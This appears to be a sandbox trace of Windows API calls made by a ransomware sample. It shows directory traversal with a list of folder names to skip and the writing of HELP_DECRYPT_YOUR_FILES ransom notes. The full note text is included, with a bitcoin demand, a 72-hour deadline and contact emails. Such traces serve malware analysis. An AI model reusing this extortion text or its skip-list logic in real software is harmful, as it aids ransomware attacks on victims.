	[0168.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.122] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="inetcache") returned 0x0
	[0168.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.123] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="nvidia") returned 0x0
	[0168.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.123] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="packages") returned 0x0
	[0168.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.123] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="cookies") returned 0x0
	[0168.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.123] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="programdata") returned 0x0
	[0168.123] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.123] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.124] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7dbc436f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.124] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.124] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AsimovUploader", cAlternateFileName="ASIMOV~1")) returned 1
	[0168.124] lstrcmpW (lpString1="AsimovUploader", lpString2="..") returned 1
	[0168.124] lstrcmpW (lpString1="AsimovUploader", lpString2=".") returned 1
	[0168.124] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0168.124] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.124] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="AsimovUploader" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader"
	[0168.125] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader"
	[0168.130] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\"
	[0168.130] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\"
	[0168.131] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*"
	[0168.131] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.131] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*") returned 57
	[0168.131] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.131] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*") returned 0x39
	[0168.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="windows") returned 0x0
	[0168.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="boot") returned 0x0
	[0168.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="system volume information") returned 0x0
	[0168.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.133] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="temp") returned 0x0
	[0168.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.133] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="program files") returned 0x0
	[0168.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.133] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.133] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="appdata") returned 0x0
	[0168.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.134] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="application data") returned 0x0
	[0168.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.134] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="winnt") returned 0x0
	[0168.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.134] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="tmp") returned 0x0
	[0168.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.134] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="cache") returned 0x0
	[0168.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="webcache") returned 0x0
	[0168.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="inetcache") returned 0x0
	[0168.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="nvidia") returned 0x0
	[0168.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="packages") returned 0x0
	[0168.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="cookies") returned 0x0
	[0168.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="programdata") returned 0x0
	[0168.136] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.136] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0168.136] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.137] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.137] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader"
	[0168.137] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*"
	[0168.137] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.138] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.138] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\HELP_DECRYPT_YOUR_FILES.TXT") returned 81
	[0168.138] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.185] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0168.185] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0168.263] CloseHandle (hObject=0x388) returned 1
	[0168.265] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.266] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0168.267] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0168.267] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.267] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0168.268] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0168.268] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0168.268] CloseHandle (hObject=0x388) returned 1
	[0168.268] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.269] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.269] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.269] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\HELP_DECRYPT_YOUR_FILES.HTML") returned 82
	[0168.269] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.269] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.270] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0168.273] CloseHandle (hObject=0x388) returned 1
	[0168.273] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.273] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.274] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0168.276] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.276] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.282] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.282] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.282] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0168.282] CloseHandle (hObject=0x388) returned 1
	[0168.283] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7dd326b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0168.283] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*") returned 57
	[0168.283] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.283] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*.*", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*") returned 0x39
	[0168.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.283] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="windows") returned 0x0
	[0168.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.284] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="boot") returned 0x0
	[0168.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.284] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="system volume information") returned 0x0
	[0168.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.284] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="temp") returned 0x0
	[0168.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="program files") returned 0x0
	[0168.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="appdata") returned 0x0
	[0168.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="application data") returned 0x0
	[0168.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="winnt") returned 0x0
	[0168.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="tmp") returned 0x0
	[0168.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="cache") returned 0x0
	[0168.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="webcache") returned 0x0
	[0168.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="inetcache") returned 0x0
	[0168.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="nvidia") returned 0x0
	[0168.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="packages") returned 0x0
	[0168.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="cookies") returned 0x0
	[0168.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\*.*", lpSrch="programdata") returned 0x0
	[0168.289] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.289] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.289] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7dd326b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.289] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.289] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dd326b4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7dd326b4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7dd58bdf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.289] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dbea530, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7dbea530, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7dd326b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
